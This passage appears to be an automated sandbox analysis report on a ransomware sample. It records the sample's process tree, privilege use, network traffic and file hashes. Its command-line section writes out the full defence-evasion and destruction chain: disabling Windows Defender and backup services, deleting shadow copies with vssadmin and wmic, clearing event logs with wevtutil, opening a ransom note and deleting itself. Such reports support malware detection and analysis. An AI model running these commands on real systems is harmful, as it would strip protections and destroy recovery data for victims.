| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\notepad.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\SysWOW64\Wbem\wmic.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command Line |
| --- | --- |
| C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe | "C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe" |
| C:\Windows\SysWOW64\net.exe | net.exe stop "SamSs" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "SamSs" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "SDRSVC" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "SDRSVC" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "SstpSvc" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "SstpSvc" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "UI0Detect" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "UI0Detect" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "vmicvss" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "vmicvss" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "VSS" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "VSS" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "wbengine" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "wbengine" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "WebClient" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "WebClient" /y |
| C:\Windows\SysWOW64\net.exe | net.exe stop "UnistoreSvc_1643c" /y |
| C:\Windows\SysWOW64\net1.exe | C:\Windows\system32\net1 stop "UnistoreSvc_1643c" /y |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "SamSs" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "SDRSVC" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "SstpSvc" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "UI0Detect" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "vmicvss" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "VSS" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "wbengine" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "WebClient" start= disabled |
| C:\Windows\SysWOW64\sc.exe | sc.exe config "UnistoreSvc_1643c" start= disabled |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
| C:\Windows\SysWOW64\reg.exe | reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\SysWOW64\vssadmin.exe
vssadmin.exe delete shadows /all /quiet
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl system
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl security
C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl application
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\SysWOW64\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\SysWOW64\notepad.exe
notepad.exe C:\iotb_HOW_TO_DECRYPT.txt
C:\Windows\SysWOW64\cmd.exe
cmd.exe /D /C ping.exe -n 5 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\3e58bda58148a39c6603954bd10e361504fd6383feef5d5f7f16cc082b78fa43.exe"
C:\Windows\SysWOW64\PING.EXE
ping.exe -n 5 127.0.0.1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | time.windows.com | udp |
| NL | 20.101.57.9:123 | time.windows.com | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 1c19c16e21c97ed42d5beabc93391fc5 |
| SHA1 | 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68 |
| SHA256 | 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05 |
| SHA512 | 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 932fbbcec97a66cb6d8b534b3adcb522 |
| SHA1 | 4b4e0903311f976910faf1ad20e79a1fd258d70e |
| SHA256 | 15a4ba93d79fe7fe5ae613f220df3c078a346279c46b013142827489aab25101 |
| SHA512 | 3e150fa1e954b3a8bad6b72c0025eb89f2c121271da9e2c6d3f941c389f5f419394d98b1b8e0d729abd1b05e8bd243838e15cdec3e1e4c64ea28ccf84177e4e5 |